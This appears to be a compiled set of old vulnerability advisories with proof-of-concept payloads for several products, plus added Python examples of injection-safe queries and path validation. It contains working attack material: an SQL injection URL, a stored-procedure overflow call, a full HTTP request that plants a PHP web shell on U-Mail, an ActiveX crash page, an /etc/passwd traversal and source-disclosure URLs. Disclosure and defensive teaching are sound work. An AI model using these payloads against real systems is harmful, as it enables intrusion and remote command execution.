RJ-iTop Network Vulnerability Scanner System Multiple SQL Injection Vulnerabilities
Vulnerable: v3.0.7.x
Vendor: www.rj-itop.com
Category: Input Validation Error
Impact: SQL injection
Details:
=========
Multiple SQL injection vulnerabilities have been found in RJ-iTop Network Vulnerability Scanner System, which can be exploited by malicious users to conduct SQL injection and script insertion attacks. Authentication is required to exploit these vulnerabilities.
POC:
=========
https://8.8.8.8/roleManager.jsp?type=query&id= [SQL Injection]
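The PoC URL above hands an attacker-controlled id parameter to roleManager.jsp, which evidently splices it into a query. As an added example (this is not the vendor's code; the JSP source and real schema are unknown, so the role table, its columns and the sample rows are constructed), the following Python shows the string-concatenation pattern behind this class of bug next to the bound-parameter form, using an in-memory SQLite database so it runs offline:

```python
import re
import sqlite3

# Constructed sample data standing in for whatever table roleManager.jsp reads;
# the real schema is not known, so table and column names are assumptions.
SAMPLE_ROLES = [(1, "admin", "full"), (2, "auditor", "read"), (3, "guest", "none")]


def make_db():
    """Create an in-memory SQLite database holding the constructed role table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE role (id INTEGER PRIMARY KEY, name TEXT, perms TEXT)")
    conn.executemany("INSERT INTO role VALUES (?, ?, ?)", SAMPLE_ROLES)
    return conn


def query_role_unsafe(conn, role_id):
    """The bug class: the request parameter is spliced into the SQL text.

    'id=1 OR 1=1' returns every row; an empty id (as in the PoC URL) is a
    syntax error, the kind of verbose failure that reveals the injection.
    """
    sql = "SELECT id, name, perms FROM role WHERE id = " + role_id
    return conn.execute(sql).fetchall()


def is_valid_role_id(value):
    """An id must be a plain ASCII decimal integer; anything else is rejected."""
    return re.fullmatch(r"[0-9]{1,18}", value) is not None


def query_role_safe(conn, role_id):
    """Validate the type, then bind the value so it never becomes SQL text."""
    if not is_valid_role_id(role_id):
        raise ValueError("role id must be a positive integer")
    sql = "SELECT id, name, perms FROM role WHERE id = ?"
    return conn.execute(sql, (int(role_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("unsafe, id=1 OR 1=1 ->", query_role_unsafe(db, "1 OR 1=1"))
    print("safe,   id=2        ->", query_role_safe(db, "2"))
```

Binding alone is what removes the injection; the explicit integer check in front of it is defence in depth that also turns the PoC's empty id into a clean 4xx-style rejection instead of a database error message.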
Timeline:
========
2009.10.19 Report to vendor (vendor did not respond)
2009.11.15 Report to vendor a second time
2009.11.19 Report to CNNVD
2010.04.13 Public
DM Database Server Memory Corruption Vulnerability
========
Vulnerable: All versions
Vendor: www.dameng.com
Discovered by: Shennan Wang (HuaweiSymantec SRT)
CVE: CVE-2010-2159
Details:
=========
A vulnerability in all versions of DM Database Server allows an attacker to execute arbitrary code or cause a DoS (Denial of Service). Authentication is required to exploit this vulnerability.
The specific flaw exists within the SP_DEL_BAK_EXPIRED procedure.
POC:
=========
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');
(458.5fc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=02d3d430 ecx=ffffffff edx=074ecfd0 esi=074ed37c edi=0000041c
eip=100d1753 esp=074eccec ebp=074ed1fc iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
*** WARNING: Unable to verify checksum for C:\dmdbms\bin\wdm_dll.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\dmdbms\bin\wdm_dll.dll - wdm_dll+0xd1753:
100d1753 f2ae repne scas byte ptr es:[edi]
0:009> da ebp
074ed1fc "AAAAAAAAAAAAAAAAAAAA"
Timeline:
========
2010.04.17 Report to vendor, no response.
2010.05.31 Public
U-Mail Webmail Arbitrary File Write Vulnerability
==================================================
Vulnerable: U-Mail 4.91
Vendor: www.comingchina.com
Category: Input Validation Error
Impact: An attacker can write arbitrary data to new files.
Author: Shennan Wang
Date: 2008-10-30
Web: http://hi.baidu.com/nansec
CVE: CVE-2008-4932
Details:
=========
This vulnerability allows remote attackers to write arbitrary files on vulnerable installations of U-Mail Webmail Server. Authentication is required to exploit this vulnerability. The specific flaw exists in the 'edit.php' file running on the U-Mail Webmail Server. A malicious HTTP POST request can write an arbitrary file into the publicly accessible web directories.
Exploit:
=========
POST /webmail/modules/filesystem/edit.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-silverlight, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*
Referer: http://mail.d4rkn3t.cn/webmail/modules/filesystem/edit.php
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Host: mail.d4rkn3t.cn
Content-Length: 120
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: GO_AUTH_SOURCE_KEY=0; LANGUAGE_CK=zh_CN; SCREEN_CK=Default+Style; PHPSESSID=0fa330ffdfd62d9e1bd8bd3942974a18

path=/var/www/htdocs/webmail/cmd.php&task=save&name=cmd.php&content=<?system($_GET[cmd]);?>
Microsoft Works 7 WkImgSrv.dll Crash PoC
========
WkImgSrv.dll version: 7.03.0616.0
Tested on: IE7 + XP SP2 (CN)
Reference: http://marc.info/?l=bugtraq&m=120845200813992&w=2
POC:
<html>
<head>
<title>Microsoft Works 7 WkImgSrv.dll crash POC</title>
<script language="JavaScript">
function payload() {
var num = -1;
obj.WksPictureInterface = num;
}
</script>
</head>
<body onload="JavaScript: return payload();">
<object classid="clsid:00E1DB59-6EFD-4CE7-8C0A-2DA3BCAAD9C6" id="obj">
</object>
</body>
</html>
Directory traversal in EdiorCMS V3.0
Application: EdiorCMS V3.0
Vendor: http://www.edior.com
Versions: 3.0
Platforms: ALL
Bug: Directory traversal
Exploitation: remote
Date: 13 Mar 2008
Author: Shennan Wang
e-mail: wsn1983@gmail.com
POC: http://site/ecms/search.php?_SearchKeyWord=&_SearchField=Title&_SearchTemplate=../../../../../../etc/passwd
Alt-N WebAdmin Source Code Disclosure Vulnerability
========
Vulnerable: v3.3.3
Vendor: www.altn.com
Category: Environment Error
Vulnerable
========
Alt-N WebAdmin 3.3.3
U-Mail for Windows V9.8
U-Mail GateWay for Windows V9.8
Details:
=========
A source code disclosure vulnerability exists in Alt-N WebAdmin Server. A remote attacker can disclose the source code of a script by appending "%2e" or "%20" to its URI.
Tested on U-Mail for Windows V9.8 and U-Mail GateWay for Windows V9.8.
POC:
=========
http://ip:1000/login.wdm%20
http://ip:1000/login.wdm%2e
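Three of the advisories on this page share one underlying failure, a request value used as a file path without being confined: U-Mail's edit.php accepts an absolute 'path' and a '.php' filename, EdiorCMS's _SearchTemplate accepts '../' sequences, and WebAdmin returns the source of login.wdm when the name carries a trailing encoded space or dot (the usual cause on Windows being that the filesystem strips the trailing character after the script-handler lookup has already failed to match the extension). As an added example, not code from any of these vendors, the following Python resolver applies the checks that would have rejected each of the PoC values; the base directory, the extension allow-list and the sample inputs are constructed assumptions:

```python
import os
import posixpath
from urllib.parse import unquote


class UnsafePath(ValueError):
    """Raised when a user-supplied file reference must not be read or written."""


def resolve_safe_path(base_dir, user_value, allowed_exts):
    """Map a user-supplied file reference onto a path inside base_dir, or raise.

    base_dir     -- directory the application may touch (chosen by the server)
    user_value   -- raw request value, possibly percent-encoded
    allowed_exts -- set of lower-case extensions such as {".html"}
    """
    # Decode once. A '%' surviving the decode means double encoding, a common
    # way to slip past naive filters; refuse it rather than decode again.
    decoded = unquote(user_value)
    if "%" in decoded:
        raise UnsafePath("double-encoded input")
    # NUL bytes and control characters truncate or confuse C-level file APIs.
    if any(ord(ch) < 32 for ch in decoded):
        raise UnsafePath("control character in path")
    # Treat backslash as a separator too so the same rules hold on Windows.
    rel = decoded.replace("\\", "/")
    # The server, not the client, decides where files live: no absolute paths
    # and no drive letters (this is the U-Mail 'path=/var/www/...' case).
    if rel.startswith("/") or (len(rel) > 1 and rel[1] == ":"):
        raise UnsafePath("absolute path")
    segments = rel.split("/")
    for seg in segments:
        # '..' is the traversal primitive (EdiorCMS _SearchTemplate case).
        if seg in ("", ".", ".."):
            raise UnsafePath("traversal or empty segment")
        # Windows strips trailing dots and spaces when opening a file, so
        # 'login.wdm ' and 'login.wdm.' read login.wdm while bypassing any
        # handler keyed on the exact extension (WebAdmin case).
        if seg != seg.rstrip(" ."):
            raise UnsafePath("trailing dot or space")
    # Extension allow-list on the final component: a template editor has no
    # reason to create cmd.php.
    ext = posixpath.splitext(segments[-1])[1].lower()
    if ext not in allowed_exts:
        raise UnsafePath("extension not allowed")
    # Containment check after symlink resolution, as the last line of defence.
    base = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(base, *segments))
    if os.path.commonpath([base, full]) != base:
        raise UnsafePath("escapes base directory")
    return full


def is_safe_path(base_dir, user_value, allowed_exts):
    """Boolean convenience wrapper around resolve_safe_path."""
    try:
        resolve_safe_path(base_dir, user_value, allowed_exts)
        return True
    except UnsafePath:
        return False


if __name__ == "__main__":
    # Constructed inputs mirroring the PoC values from the three advisories.
    base = "/srv/app/templates"  # hypothetical base directory
    for value in ("default.html", "../../../../../../etc/passwd",
                  "/var/www/htdocs/webmail/cmd.php", "cmd.php",
                  "login.wdm%20", "login.wdm%2e", "login.wdm"):
        ok = is_safe_path(base, value, {".html", ".wdm"})
        print(f"{value!r}: {'ok' if ok else 'rejected'}")
```

The order matters: decoding happens exactly once and before any pattern check, the extension is tested on the decoded final segment, and the realpath containment check runs last so that a symlink inside the base directory cannot undo the earlier rejections.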
Reference:
=========
www.comingchina.com/download.html
http://www.nansec.com/